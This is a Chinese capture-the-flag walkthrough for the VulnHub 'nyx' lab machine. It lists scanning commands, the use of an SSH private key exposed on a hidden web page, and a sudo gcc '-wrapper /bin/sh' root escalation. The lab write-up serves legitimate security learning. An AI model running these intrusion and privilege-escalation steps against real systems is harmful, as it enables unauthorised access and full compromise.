环境配置
nyx靶机镜像地址:http://www.vulnhub.com/entry/nyx-1,535/
Kali Linux IP: 192.168.1.128
nyx IP:192.168.1.137
信息收集
- 利用arp-scan,扫描本地局域网主机:
arp-scan -l
- 利用nmap常规扫描目标主机:
nmap -A -p- 192.168.1.137
- 利用dirb对站点目录进行枚举:
dirb http://192.168.1.137
然而并没有找到有价值的界面,尝试访问http://192.168.1.137
没有任何有用的线索,对ssh进行暴力破解没有结果。
- 查了nmap的高级用法,利用nmap的http-enum脚本对80端口再次扫描:
nmap -p80 --script=http-enum 192.168.1.137
发现可疑站点:http://192.168.1.137/d41d8cd98f00b204e9800998ecf8427e.php
站点标题为:mpampis key
漏洞利用
- 信息收集所得,看起来是mpampis用户的ssh私钥,尝试ssh免密登录:
创建私钥文件,复制数据保存,并修改权限:
touch id_rsa
gedit id_rsa
chmod 600 id_rsa
- 尝试使用私钥免密登录:
ssh -i id_rsa mpampis@192.168.1.137
成功getshell!!
在当前用户目录下找到user.txt:
权限提升
- 运行sudo -l 查看用户权限:
sudo -l
发现有一个gcc的特权,到站点:https://gtfobins.github.io/
查询是否有可用提权方法。
sudo gcc -wrapper /bin/sh,-s .
提权成功: